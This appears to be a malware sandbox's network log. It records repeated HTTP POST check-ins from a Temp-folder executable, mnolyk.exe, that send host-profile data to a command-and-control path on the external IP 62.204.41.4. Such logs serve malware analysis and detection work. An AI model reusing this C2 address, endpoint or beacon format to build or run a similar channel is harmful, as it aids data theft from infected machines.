                                                                    Date: Wed, 08 Feb 2023 20:32:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    208 | 192.168.2.3 | 49910 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:15.871067047 CET | 409 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:15.938445091 CET | 409 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    209 | 192.168.2.3 | 49911 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:16.121218920 CET | 410 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:16.187607050 CET | 410 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    21 | 192.168.2.3 | 49722 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:17.801754951 CET | 222 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:17.865456104 CET | 222 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    210 | 192.168.2.3 | 49912 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:16.359167099 CET | 411 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:16.422133923 CET | 411 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    211 | 192.168.2.3 | 49913 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:16.595551968 CET | 412 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:16.661514044 CET | 412 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    212 | 192.168.2.3 | 49914 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:16.837699890 CET | 413 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:16.904551029 CET | 413 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    213 | 192.168.2.3 | 49915 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:17.076591015 CET | 413 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:17.142472982 CET | 414 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    214 | 192.168.2.3 | 49916 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:17.326422930 CET | 414 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:17.389087915 CET | 415 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    215 | 192.168.2.3 | 49917 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:17.561486006 CET | 415 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:17.625283957 CET | 416 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    216 | 192.168.2.3 | 49918 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:17.798707962 CET | 416 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:17.864259005 CET | 417 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    217 | 192.168.2.3 | 49919 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:18.035542965 CET | 417 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:18.102407932 CET | 418 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    218 | 192.168.2.3 | 49920 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:18.281071901 CET | 418 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:18.344707966 CET | 419 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    219 | 192.168.2.3 | 49921 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:18.515785933 CET | 419 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:18.579456091 CET | 420 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    22 | 192.168.2.3 | 49724 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:22.157496929 CET | 223 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:22.226195097 CET | 223 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    220 | 192.168.2.3 | 49922 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:18.772895098 CET | 420 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:18.836345911 CET | 421 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    221 | 192.168.2.3 | 49923 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:19.023555994 CET | 421 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:19.092922926 CET | 422 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    222 | 192.168.2.3 | 49924 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:19.271281004 CET | 422 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:19.336977959 CET | 423 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    223 | 192.168.2.3 | 49925 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:19.523158073 CET | 423 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:19.588732004 CET | 424 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    224 | 192.168.2.3 | 49926 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:19.767739058 CET | 424 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
